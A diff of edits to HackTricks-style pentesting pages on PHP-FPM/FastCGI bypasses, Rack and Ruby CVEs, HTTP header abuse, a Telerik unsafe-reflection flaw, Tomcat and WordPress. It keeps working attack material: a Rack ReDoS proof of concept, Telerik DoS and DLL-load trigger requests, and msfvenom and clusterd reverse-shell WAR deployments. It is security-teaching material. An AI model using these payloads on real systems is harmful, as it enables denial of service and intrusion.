-### [**FuckFastGCI**](https://github.com/w181496/FuckFastcgi)
+### [**FuckFastCGI**](https://github.com/w181496/FuckFastcgi)
 
-This is a php script to exploit fastcgi protocol to bypass `open_basedir` and `disable_functions`.\
-It will help you to bypass strict `disable_functions` to RCE by loading the malicious extension.\
-You can access it here: [https://github.com/w181496/FuckFastcgi](https://github.com/w181496/FuckFastcgi) or a sligtly modified and improved version here: [https://github.com/BorelEnzo/FuckFastcgi](https://github.com/BorelEnzo/FuckFastcgi)
+This PHP script speaks FastCGI and can bypass `open_basedir` or achieve code execution despite `disable_functions` by loading a malicious extension when its prerequisites are met.\
+The original is at [w181496/FuckFastcgi](https://github.com/w181496/FuckFastcgi), with a modified version at [BorelEnzo/FuckFastcgi](https://github.com/BorelEnzo/FuckFastcgi).
 
 You will find that the exploit is very similar to the previous code, but instead of trying to bypass `disable_functions` using `PHP_VALUE`, it tries to **load an external PHP module** using `extension_dir` and `extension` inside `PHP_ADMIN_VALUE`. That is the important distinction: if you can directly talk to PHP-FPM, forcing it to load an attacker-controlled extension is usually the path that turns FastCGI access into real code execution even when `system`, `exec`, `shell_exec`, and friends remain disabled.<sup>[[3]](#references)</sup>\
 **NOTE1**: You probably will need to **recompile** the extension with the **same PHP version/build that the server** is using (you can check it inside the output of phpinfo):
@@ -455,7 +454,7 @@ The improved fork also contains a **pure-PHP variant** that abuses `sendmail_pat
 
 ### PHP-FPM Remote Code Execution Vulnerability (CVE-2019–11043)
 
-You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) and test is using this docker environment: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).\
+You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) and test it using this Docker environment: [Vulhub CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).\
 You can also find an analysis of the vulnerability [**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.**
 
 ## References

--- a/src/network-services-pentesting/pentesting-web/ruby-tricks.md
+++ b/src/network-services-pentesting/pentesting-web/ruby-tricks.md
@@ -7,7 +7,8 @@
 As explained in [this article](https://www.offsec.com/blog/cve-2024-46986/), uploading a `.rb` file into sensitive directories such as `config/initializers/` can lead to remote code execution (RCE) in Ruby on Rails applications.<sup>[[14]](#references)</sup>
 
 Tips:
-- Other boot/eager-load locations that are executed on app start are also risky when writeable (e.g., `config/initializers/` is the classic one). If you find an arbitrary file upload that lands anywhere under `config/` and is later evaluated/required, you may obtain RCE at boot.
+
+- Other boot/eager-load locations executed at application start are also risky when writable (`config/initializers/` is the classic example). If an arbitrary file upload lands under `config/` and is later evaluated or required, it may produce RCE at boot.
 - Look for dev/staging builds that copy user-controlled files into the container image where Rails will load them on boot.
 
 ## Active Storage image transformation → command execution (CVE-2025-24293)
@@ -41,20 +42,20 @@ If the target stack uses Rack middleware directly or via frameworks, versions of
 
 - Mitigation: upgrade Rack; ensure `:root` only points to a directory of public files and is explicitly set.
 
-## Rack multipart parser ReDoS / request smuggling (CVE-2024-25126)
+## Rack `Content-Type` parsing ReDoS (CVE-2024-25126)
 
-Rack < `3.0.9.1` and < `2.2.8.1` spent super-linear time parsing crafted `Content-Type: multipart/form-data` headers. A single POST with a gigantic `A=` parameter list can peg a Puma/Unicorn worker and cause DoS or request queue starvation.<sup>[[10]](#references)</sup>
+Rack versions before `3.0.9.1` and `2.2.8.1` spent quadratic time splitting crafted `Content-Type` headers. A header containing tens of thousands of leading spaces can occupy a Puma/Unicorn worker and cause denial of service or request-queue starvation.<sup>[[10]](#references)</sup>
 
 - Quick PoC (will hang one worker):
   ```bash
   python - <<'PY'
 import requests
-h = {'Content-Type': 'multipart/form-data; ' + 'A='*5000}
+h = {'Content-Type': (' ' * 50_000) + 'a,'}
 requests.post('http://target/', data='x', headers=h)
 PY
   ```
-- Works against any Rack-based stack (Rails/Sinatra/Hanami/Grape). If fronted by nginx/haproxy with keep-alive, repeat in parallel to exhaust workers.
-- Patched by making parser linear; look for `rack` gem version < `3.0.9.1` or < `2.2.8.1`. In assessments, point out that WAFs rarely block this because the header is syntactically valid.
+- The vulnerable parser can be reached through many Rack-based stacks, including Rails and Sinatra, subject to proxy/header-size limits. Use a controlled environment or a single low-impact request during authorized testing.
+- The fix makes parsing linear. Look for `rack` versions below `3.0.9.1` or `2.2.8.1`; do not assume a WAF blocks the syntactically valid header.
 
 ## REXML XML parser ReDoS (CVE-2024-49761)
 
@@ -75,16 +76,17 @@ Apps using the `cgi` gem (default in many Rack stacks) can be frozen with a sing
 
 Both issues are fixed in `cgi` 0.3.5.1 / 0.3.7 / 0.4.2. For pentests, drop a massive `Cookie:` header or feed untrusted HTML to helper code and watch for worker lockup. Combine with keep-alive to amplify.
 
-## Basecamp `googlesign_in` open redirect / cookie flash leak (CVE-2025-57821)
+## Basecamp `google_sign_in` open redirect chain (CVE-2025-57821)
 
-The `googlesign_in` gem < 1.3.0 (used for Google OAuth on Rails) performed an incomplete same-origin check on the `proceedto` parameter. A malformed URL like `proceedto=//attacker.com/%2F..` bypasses the check and redirects the user off-site while preserving Rails flash/session cookies.<sup>[[16]](#references)</sup>
+The `google_sign_in` gem before 1.3.0 performed an incomplete same-origin check on its persisted post-authentication redirect URL. A malformed URL could pass that check and redirect the user to another origin, potentially exposing authentication information such as a token.<sup>[[16]](#references)</sup>
 
 Exploit flow:
-1. Victim clicks crafted Google Sign-In link hosted by attacker.
-2. After authentication, the gem redirects to attacker-controlled domain, leaking flash notices or any data stored in cookies scoped to the wildcard domain.
-3. If the app stores short-lived tokens or magic links in flash, this can be turned into account takeover.
 
-During testing, grep Gemfile.lock for `googlesign_in` < 1.3.0 and try malformed `proceedto` values. Confirm via Location header and cookie reflection.
+1. First obtain a separate primitive that can inject arbitrary data into the application's cookie-backed session. The maintainer advisory states there is no known vector when session state is stored in a database.
+2. Inject the malformed redirect value into the session/flash state used by `google_sign_in`.
+3. After authentication, the gem follows the attacker-controlled cross-origin redirect. If authentication information is incorporated into that flow, it may be exposed and lead to account compromise.<sup>[[16]](#references)</sup>
+
+During testing, inspect `Gemfile.lock` for `google_sign_in` before 1.3.0 and determine how the application stores session/flash data. Confirm the chained behavior through the `Location` header; do not assume a directly supplied query parameter alone reaches the persisted redirect.
 
 
 ## Rails nested mass assignment via `permit!` on a sub-object
@@ -348,7 +350,7 @@ URL-encoded PoC (first char is a newline):
 - [7] [Ruby Pathname.cleanpath docs](https://docs.ruby-lang.org/en/3.4/Pathname.html#method-i-cleanpath)
 - [8] [Ruby Logger](https://ruby-doc.org/stdlib-2.5.1/libdoc/logger/rdoc/Logger.html)
 - [9] [How Ruby load works](https://blog.appsignal.com/2023/04/19/how-to-load-code-in-ruby.html)
-- [10] [Rack multipart ReDoS advisory (CVE-2024-25126)](https://www.cve.news/cve-2024-25126/)
+- [10] [Rack security advisory: ReDoS in content-type parsing (CVE-2024-25126)](https://github.com/rack/rack/security/advisories/GHSA-22f2-v57c-j9cx)
 - [11] [Ruby security advisories for CGI / URI (CVE-2025-27219/27220/27221)](https://www.ruby-lang.org/en/news/2025/02/26/security-advisories/)
 - [12] [GitHub Advisory: Possible Log Injection in Rack::CommonLogger (CVE-2025-25184)](https://github.com/advisories/GHSA-7g2v-jj9q-g3rg)
 - [13] [Rails GlobalID README (Signed Global IDs, purpose, expiry)](https://github.com/rails/globalid)

--- a/src/network-services-pentesting/pentesting-web/special-http-headers.md
+++ b/src/network-services-pentesting/pentesting-web/special-http-headers.md
@@ -7,7 +7,7 @@
 - [https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/Web/http-request-headers](https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/Web/http-request-headers)
 - [https://github.com/rfc-st/humble](https://github.com/rfc-st/humble)
 
-## Headers to Change Location
+## Headers that influence source or routing
 
 Rewrite **IP source**:
 
@@ -56,14 +56,15 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
 
 ## The Expect header
 
-It's posible for the client to send the header `Expect: 100-continue` and then the server could respond with `HTTP/1.1 100 Continue` to allow the client to continue sending the body of the request. However, some proxies don't really llike this header.
+An HTTP/1.1 client can send `Expect: 100-continue`; the server may answer with `HTTP/1.1 100 Continue` before the client sends the request body. Differences in how frontends and backends handle the expectation and body can expose desynchronization bugs.<sup>[[8]](#references)[[10]](#references)</sup>
 
-Interesting results of `Expect: 100-continue`:
-- Sending a HEAD request with a body the server didn't took into account that HEAD requests don't have body and keep the connection open until it timed out.
-- Another servers sent extrange data: Random data read from the socket in the response, secret keys or even it allowed to prevent the front-end from removing header values.
-- It also caused a `0.CL` desync cause the backend responded with a 400 response isntead of a 100 response, but the proxy front-end was prepared to send the body of the initial request, so it sends it and the backend takes it as new request.
-- Sending an `Expect: y 100-continue` variation also caused the `0.CL` desync.
-- A similar error where the backend responded with a 404 generated a `CL.0` desync because the malicious request indicates a `Content-Length` so the backend sends the malicious request + the `Content-Length` bytes of the next request (of a victim), this desyncs the queue cause the backend sends the 404 request for the malicious request + the repsonse of the victim requests, but the front end thought that only 1 request was sent, so the second response is sent to a seond victim request and the the reponse of taht one is sent to the next one...
+Interesting observed results of `Expect: 100-continue` testing include:<sup>[[10]](#references)</sup>
+
+- A `HEAD` request with a body can make an implementation wait for bytes or time out when its message-framing assumptions differ from the peer's.
+- Some server chains have returned unexpected socket data, leaked secrets, or failed to strip a header consistently.
+- A backend that returns an error before consuming a body while the frontend still forwards it can create a `0.CL`/`CL.0`-style desynchronization: the leftover body is interpreted as the next request.
+- Obfuscated values such as `Expect: y 100-continue` can exercise a different frontend/backend parsing path.
+- Once request and response queues are out of sync, a response intended for one user can be assigned to another request. Validate suspected behavior with harmless canary requests rather than real victim traffic.
 
 For more info about HTTP Request Smuggling check:
 
@@ -88,24 +89,24 @@ For more info about HTTP Request Smuggling check:
 ../../pentesting-web/cache-deception/
 {{#endref}}
 
-**Local Cache headers**:
+**Browser and legacy cache headers**:<sup>[[9]](#references)</sup>
 
 - `Clear-Site-Data`: Header to indicate the cache that should be removed: `Clear-Site-Data: "cache", "cookies"`
 - `Expires`: Contains date/time when the response should expire: `Expires: Wed, 21 Oct 2015 07:28:00 GMT`
-- `Pragma: no-cache` same as `Cache-Control: no-cache`
-- `Warning`: The **`Warning`** general HTTP header contains information about possible problems with the status of the message. More than one `Warning` header may appear in a response. `Warning: 110 anderson/1.3.37 "Response is stale"`
+- `Pragma: no-cache` is a deprecated HTTP/1.0 request directive retained for compatibility; its response semantics were never a reliable substitute for `Cache-Control: no-cache`.
+- `Warning` historically carried cache/status warnings such as `Warning: 110 anderson/1.3.37 "Response is stale"`, but RFC 9111 obsoletes the field.<sup>[[9]](#references)</sup>
 
 ## Conditionals
 
-- Requests using these headers: **`If-Modified-Since`** and **`If-Unmodified-Since`** will be responded with data only if the response header**`Last-Modified`** contains a different time.
-- Conditional requests using **`If-Match`** and **`If-None-Match`** use an Etag value so the web server will send the content of the response if the data (Etag) has changed. The `Etag` is taken from the HTTP response.
-  - The **Etag** value is usually **calculated based** on the **content** of the response. For example, `ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` indicates that the `Etag` is the **Sha1** of **37 bytes**.
+- **`If-Modified-Since`** asks for the representation only if it changed after the supplied date; otherwise a successful conditional `GET`/`HEAD` normally receives `304`. **`If-Unmodified-Since`** instead requires that the resource has not changed and otherwise normally produces `412` for a state-changing request.<sup>[[8]](#references)</sup>
+- **`If-Match`** requires a current entity-tag match, while **`If-None-Match`** requires no match. For `GET`/`HEAD`, a failed `If-None-Match` condition normally returns `304`; for other methods it returns `412`.<sup>[[8]](#references)</sup>
+  - Entity-tag generation is implementation-specific. For example, `W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` is a weak validator from a particular framework; its syntax alone does not prove that the value is SHA-1 or that `37` represents a byte count.
 
 ## Range requests
 
 - **`Accept-Ranges`**: Indicates if the server supports range requests, and if so in which unit the range can be expressed. `Accept-Ranges: <range-unit>`
-- **`Range`**: Indicates the part of a document that the server should return. For emxaple, `Range:80-100` will return the bytes 80 to 100 of the original response with a status code of 206 Partial Content. Also remember to remove the `Accept-Encoding` header from the request.
-  - This could be useful to get a repsonse with arbitrary reflected javascript code that otherwise could be escaped. But to abuse this you would need to inject this headers in the request.
+- **`Range`**: Requests part of a representation. For example, `Range: bytes=80-100` asks for bytes 80 through 100 and can produce `206 Partial Content`. Removing `Accept-Encoding` often makes byte offsets easier to reason about.<sup>[[8]](#references)</sup>
+  - If an attacker can inject a `Range` request header, a partial response may isolate reflected JavaScript or other bytes that were harmless in the complete representation. Exploitability depends on browser behavior, content type, and intermediary caching.
 - **`If-Range`**: Creates a conditional range request that is only fulfilled if the given etag or date matches the remote resource. Used to prevent downloading two ranges from incompatible version of the resource.
 - **`Content-Range`**: Indicates where in a full body message a partial message belongs.
 
@@ -117,7 +118,7 @@ For more info about HTTP Request Smuggling check:
 - **`Content-Language`**: Describes the human language(s) intended for the audience, so that it allows a user to differentiate according to the users' own preferred language.
 - **`Content-Location`**: Indicates an alternate location for the returned data.
 
-From a pentest point of view this information is usually "useless", but if the resource is **protected** by a 401 or 403 and you can find some **way** to **get** this **info**, this could be **interesting.**\
+These fields are often routine, but differences on a resource protected by `401` or `403` can become an oracle for hidden content.\
 For example a combination of **`Range`** and **`Etag`** in a HEAD request can leak the content of the page via HEAD requests:
 
 - A request with the header `Range: bytes=20-20` and with a response containing `ETag: W/"1-eoGvPlkaxxP4HqHv6T3PNhV9g3Y"` is leaking that the SHA1 of the byte 20 is `ETag: eoGvPlkaxxP4HqHv6T3PNhV9g3Y`
@@ -309,7 +310,7 @@ From a security perspective, missing or overly permissive `Permissions-Policy` h
 
 ## Header Name Casing Bypass
 
-HTTP/1.1 defines header field‐names as **case-insensitive** (RFC 9110 §5.1). Nevertheless, it is very common to find custom middleware, security filters, or business logic that compare the *literal* header name received without normalising the casing first (e.g. `header.equals("CamelExecCommandExecutable")`).  If those checks are performed **case-sensitively**, an attacker may bypass them simply by sending the same header with a different capitalisation.<sup>[[1]](#references)</sup>
+HTTP field names are **case-insensitive** (RFC 9110 §5.1). Nevertheless, custom middleware, security filters, or business logic sometimes compare the literal header name without normalizing its case. If a filter is case-sensitive but the downstream consumer is compliant and case-insensitive, an attacker may bypass the filter with different capitalization.<sup>[[1]](#references)[[8]](#references)</sup>
 
 Typical situations where this mistake appears:
 
@@ -320,7 +321,7 @@ Typical situations where this mistake appears:
 ### Abusing the bypass
 
 1. Identify a header that is filtered or validated server-side (for example, by reading source code, documentation, or error messages).
-2. Send the **same header with a different casing** (mixed-case or upper-case).  Because HTTP stacks usually canonicalise headers only *after* user code has run, the vulnerable check can be skipped.
+2. Send the **same header with different casing**. Whether the spelling survives to vulnerable user code depends on the server and framework, so test the complete proxy-to-application chain.
 3. If the downstream component treats headers in a case-insensitive way (most do), it will accept the attacker-controlled value.
 
 ### Example: Apache Camel `exec` RCE (CVE-2025-27636)
@@ -352,5 +353,8 @@ The headers reach the `exec` component unfiltered, resulting in remote command e
 - [5] [web.dev - Security headers article](https://web.dev/articles/security-headers)
 - [6] [Bishop Fox - A Crash, Not a Shell: SolarWinds Serv-U CVE-2026-28318](https://bishopfox.com/blog/a-crash-not-a-shell-solarwinds-serev-u-cve-2026-28318)
 - [7] [BishopFox/CVE-2026-28318-check](https://github.com/BishopFox/CVE-2026-28318-check)
+- [8] [RFC 9110: HTTP Semantics](https://www.rfc-editor.org/rfc/rfc9110.html)
+- [9] [RFC 9111: HTTP Caching](https://www.rfc-editor.org/rfc/rfc9111.html)
+- [10] [PortSwigger Research: HTTP/1.1 must die — the desync endgame](https://portswigger.net/research/http1-must-die)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/telerik-ui-aspnet-ajax-unsafe-reflection-webresource-axd.md
+++ b/src/network-services-pentesting/pentesting-web/telerik-ui-aspnet-ajax-unsafe-reflection-webresource-axd.md
@@ -6,8 +6,8 @@
 
 ## TL;DR
 
-- Affected component/route: Telerik.Web.UI.WebResource.axd with query type=iec (Image Editor cache handler). Exposed pre‑auth in many products.
-- Primitive: Attacker controls a type name (prtype). The handler resolves it with Type.GetType() and invokes Activator.CreateInstance() before verifying interface type-safety. Any public parameterless .NET type constructor will run.<sup>[[2]](#references)</sup>
+- Affected component/route: `Telerik.Web.UI.WebResource.axd` with query `type=iec` (Image Editor cache handler). It is exposed pre-authentication in many products.
+- Primitive: The attacker controls a type name (`prtype`). The handler resolves it with `Type.GetType()` and invokes `Activator.CreateInstance()` before verifying interface type safety. Any resolvable public parameterless .NET type constructor will run.<sup>[[2]](#references)</sup>
 - Impact:
   - Universal pre‑auth DoS with a .NET framework gadget (PowerShell WSMan finalizer).
   - Often elevates to pre‑auth RCE in real deployments by abusing app‑specific gadgets, especially insecure AppDomain.AssemblyResolve handlers.
@@ -24,7 +24,7 @@
   - GET /Telerik.Web.UI.WebResource.axd should return something other than 404/403 if the handler is wired.
   - Inspect web.config for handlers mapping to Telerik.Web.UI.WebResource.axd.
   - Do not rely on finding Telerik strings on `/` or login pages. Real products such as Sitecore often expose the handler without referencing it in the default HTML.
-- Trigger path for the vulnerable code-path requires: type=iec, dkey=1, and prtype=<AssemblyQualifiedType>.
+- Triggering the vulnerable code path requires `type=iec`, `dkey=1`, and `prtype=<AssemblyQualifiedType>`.
 
 Example probe and generic trigger:
 
@@ -32,11 +32,11 @@ Example probe and generic trigger:
 GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=Namespace.Type, Assembly
 ```
 
-Notes
+Notes:
 - Some PoCs use dtype; the implementation checks dkey=="1" for the download flow.
 - prtype must be assembly-qualified or resolvable in the current AppDomain.
 
-Useful code/ops checks
+Useful code/operations checks:
 
 ```xml
 <!-- system.web -->
@@ -134,7 +134,7 @@ protected internal static ICacheImageProvider InitCacheImageProvider(Type t)
 ```
 </details>
 
-Exploit primitive: Controlled type string → Type.GetType resolves it → Activator.CreateInstance runs its public parameterless constructor. Even if the request is rejected afterwards, gadget side‑effects already occurred.
+Exploit primitive: controlled type string → `Type.GetType` resolves it → `Activator.CreateInstance` runs its public parameterless constructor. Even if the request is rejected afterward, constructor side effects have already occurred.
 
 ## Universal DoS gadget (no app-specific gadgets required)
 
@@ -146,8 +146,9 @@ One‑shot DoS request:
 GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35
 ```
 
-Notes
-- Keep sending periodically to keep the site offline. You may observe the constructor being hit in a debugger; crash occurs on finalization.
+Notes:
+
+- In a controlled lab, repeated requests can keep recycling the worker. You may observe the constructor in a debugger before the crash occurs during finalization. Avoid this destructive validation on production systems.
 
 ## From DoS to RCE – escalation patterns
 
@@ -158,7 +159,7 @@ Unsafe constructor execution unlocks many target‑specific gadgets and chains.<
 - Example (Sitecore): a ctor chain reaches GetLayoutDefinition() which reads HTTP body "layout" and deserializes JSON via JSON.NET.
 
 2) Constructors that touch files
-- Ctros that load or deserialize config/blobs from disk can be coerced if you can write to those paths (uploads/temp/data folders).
+- Constructors that load or deserialize configuration or blobs from disk can be coerced if you can write to those paths (uploads, temporary, or data directories).
 
 3) Constructors performing app-specific ops
 - Resetting state, toggling modules, or terminating processes.
@@ -182,7 +183,7 @@ This.Class.Does.Not.Exist, watchTowr
 - Step 2 – Post‑auth: Obtain write into a resolver-probed directory (e.g., via an auth bypass or weak upload) and plant a malicious DLL.
 - Step 3 – Pre‑auth: Use CVE‑2025‑3600 with a non-existent type and a traversal‑laden assembly name to force the resolver to load your planted DLL → code execution as the IIS worker.<sup>[[2]](#references)[[5]](#references)</sup>
 
-Trigger examples
+Trigger examples:
 
 ```http
 # Load the insecure resolver (no auth on many setups)
@@ -194,7 +195,7 @@ GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=watchTowr.poc,+../../
 
 ## Validation, hunting and DFIR notes
 
-- Safe lab validation: Fire the DoS payload and watch for app pool recycle/unhandled exception tied to the WSMan finalizer.
+- Controlled-lab validation: send the DoS payload only against a disposable instance and watch for an application-pool recycle or unhandled exception tied to the WSMan finalizer.
 - Hunt in telemetry:
   - Requests to /Telerik.Web.UI.WebResource.axd with type=iec and odd prtype values.
   - Failed type loads and AppDomain.AssemblyResolve events.
@@ -204,7 +205,7 @@ GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=watchTowr.poc,+../../
 
 - Patch to Telerik UI for ASP.NET AJAX 2025.1.416 or later.<sup>[[1]](#references)</sup>
 - Remove or restrict exposure of Telerik.Web.UI.WebResource.axd where possible (WAF/rewrites).<sup>[[1]](#references)</sup>
-- Ignore or harden prtype handling server-side (upgrade applies proper checks before instantiation).
+- Reject or strictly allowlist `prtype` server-side (the upgrade applies checks before instantiation).
 - Audit and harden custom AppDomain.AssemblyResolve handlers. Avoid building paths from args.Name without sanitization; prefer strong-named loads or whitelists.
 - Constrain upload/write locations and prevent DLL drops into probed directories.
 - Monitor for non-existent type load attempts to catch resolver abuse.

--- a/src/network-services-pentesting/pentesting-web/tomcat/README.md
+++ b/src/network-services-pentesting/pentesting-web/tomcat/README.md
@@ -4,14 +4,14 @@
 
 ## Discovery
 
-- It usually runs on **port 8080**
+- A standalone/default-style installation often listens on **port 8080**, but production connectors can use any port or sit behind a reverse proxy.
 - **Common Tomcat error:**
 
 <figure><img src="../../../images/image (150).png" alt=""><figcaption></figcaption></figure>
 
 ## Enumeration
 
-### **Version Identification**
+### **Version identification**
 
 To find the version of Apache Tomcat, a simple command can be executed:
 
@@ -21,9 +21,9 @@ curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
 
 This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.
 
-### **Manager Files Location**
+### **Manager application location**
 
-Identifying the exact locations of **`/manager`** and **`/host-manager`** directories is crucial as their names might be altered. A brute-force search is recommended to locate these pages.<sup>[[2]](#references)</sup>
+Probe for the standard **`/manager`** and **`/host-manager`** applications, while allowing for nonstandard context paths or removal. Modern default configurations do not grant remote management access merely because the application exists.<sup>[[2]](#references)[[5]](#references)</sup>
 
 ### **Username Enumeration**
 
@@ -52,7 +52,7 @@ msf> use auxiliary/scanner/http/tomcat_mgr_login
 
 Another notable directory is **`/manager/status`**, which displays the Tomcat and OS version, aiding in vulnerability identification.
 
-### **Brute Force Attack**
+### **Brute-force attack**
 
 To attempt a brute force attack on the manager directory, one can use:
 
@@ -66,13 +66,13 @@ Along with setting various parameters in Metasploit to target a specific host.
 
 ### **Password Backtrace Disclosure**
 
-Accessing `/auth.jsp` may reveal the password in a backtrace under fortunate circumstances.
+An application-specific `/auth.jsp` may expose submitted credentials in a verbose exception or backtrace. This is not a standard Tomcat endpoint; treat it as a content-discovery and error-handling check.
 
 ### **Double URL Encoding**
 
-The CVE-2007-1860 vulnerability in `mod_jk` allows for double URL encoding path traversal, enabling unauthorized access to the management interface via a specially crafted URL.
+In `mod_jk` versions before 1.2.23, CVE-2007-1860 allowed crafted, possibly double-encoded traversal through a prefix `JkMount` to reach protected pages.<sup>[[4]](#references)</sup>
 
-In order to access to the management web of the Tomcat go to: `pathTomcat/%252E%252E/manager/html`
+A historical probe for the management application is: `pathTomcat/%252E%252E/manager/html`.
 
 ### /examples
 
@@ -103,7 +103,7 @@ Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible t
 
 ### **Path Traversal Exploit**
 
-In some [**vulnerable configurations of Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) you can gain access to protected directories in Tomcat using the path: `/..;/`
+In some [**vulnerable reverse-proxy mappings**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/), path-parameter and normalization differences can expose protected Tomcat directories with a segment such as `/..;/`.<sup>[[6]](#references)</sup>
 
 So, for example, you might be able to **access the Tomcat manager** page by accessing: `www.vulnerable.com/lalala/..;/manager/html`
 
@@ -115,7 +115,7 @@ Finally, if you have access to the Tomcat Web Application Manager, you can **upl
 
 ### Limitations
 
-You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](#post)section).
+WAR deployment requires the appropriate Manager role: `manager-gui` for the HTML interface or `manager-script` for the text API used by `curl`. `manager-status` is read-only, while `admin-gui` and `admin-script` belong to the separate Host Manager application. Realm users and roles may be defined in `tomcat-users.xml`, whose path varies by installation (for example, `/usr/share/tomcat9/etc/tomcat-users.xml`).<sup>[[5]](#references)</sup> See [Post-exploitation](#post-exploitation).
 
 ```bash
 # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
@@ -146,11 +146,11 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
 ```
 
-2. Upload the `revshell.war` file and access to it (`/revshell/`):
+2. Upload `revshell.war` and request its deployed context (`/revshell/`).
 
 ### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
 
-In some scenarios this doesn't work (for example old versions of sun)
+This may fail on older or incompatible Java runtimes.
 
 #### Download
 
@@ -170,7 +170,7 @@ git clone https://github.com/mgeeky/tomcatWarDeployer.git
 ./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
 ```
 
-### Using [Culsterd](https://github.com/hatRiot/clusterd)
+### Using [Clusterd](https://github.com/hatRiot/clusterd)
 
 ```bash
 clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
@@ -224,9 +224,9 @@ zip -r backup.war cmd.jsp
 # Go to: http://tomcat-site.local:8180/backup/cmd.jsp
 ```
 
-## POST
+## Post-exploitation
 
-Name of Tomcat credentials file is `tomcat-users.xml` and this file indicates the role of the user inside tomcat.
+The file-based realm commonly uses `tomcat-users.xml` to define Tomcat users and their roles. Other Realm implementations can store identities elsewhere.
 
 ```bash
 find / -name tomcat-users.xml 2>/dev/null
@@ -254,7 +254,7 @@ Example:
 <user username="admin" password="admin" roles="manager-gui,admin-gui" />
 ```
 
-## Other tomcat scanning tools
+## Other Tomcat scanning tools
 
 - [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
 
@@ -263,5 +263,8 @@ Example:
 - [1] [Nexpose / Metasploitable sample scan report (HackerTarget)](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)
 - [2] [Pentest-Tomcat (simran-sankhala)](https://github.com/simran-sankhala/Pentest-Tomcat)
 - [3] [Apache Tomcat example scripts information leaks (Rapid7)](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)
+- [4] [NVD: CVE-2007-1860 in the Tomcat JK connector](https://nvd.nist.gov/vuln/detail/CVE-2007-1860)
+- [5] [Apache Tomcat Manager application documentation](https://tomcat.apache.org/tomcat-11.0-doc/manager-howto.html)
+- [6] [Acunetix: Tomcat path traversal via reverse-proxy mapping](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/wordpress.md
+++ b/src/network-services-pentesting/pentesting-web/wordpress.md
@@ -1,15 +1,15 @@
-# Wordpress
+# WordPress
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
 - **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
-- **Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+- **Theme files are stored under `/wp-content/themes/`.** If an administrator modifies a PHP template to obtain code execution, the corresponding theme path can be requested directly. For example, the Twenty Twelve theme's `404.php` template is normally reachable at [**`/wp-content/themes/twentytwelve/404.php`**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php).
 
-  - **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+  - On an installation that actually contains and activates a theme named `default`, another path to test is **`/wp-content/themes/default/404.php`**.
 
-- In **wp-config.php** you can find the root password of the database.
+- **`wp-config.php`** contains the WordPress database credentials. The configured database user may be privileged, but it is not necessarily the database `root` account.<sup>[[21]](#references)</sup>
 - Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
 
 ### **Main WordPress Files**
@@ -22,23 +22,25 @@
   - `/wp-admin/wp-login.php`
   - `/login.php`
   - `/wp-login.php`
-- `xmlrpc.php` is a file that represents a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
+- `xmlrpc.php` exposes the legacy XML-RPC interface over HTTP. Modern integrations generally use the WordPress REST API, but XML-RPC remains present and can still be enabled.<sup>[[22]](#references)</sup>
 - The `wp-content` folder is the main directory where plugins and themes are stored.
-- `wp-content/uploads/` Is the directory where any files uploaded to the platform are stored.
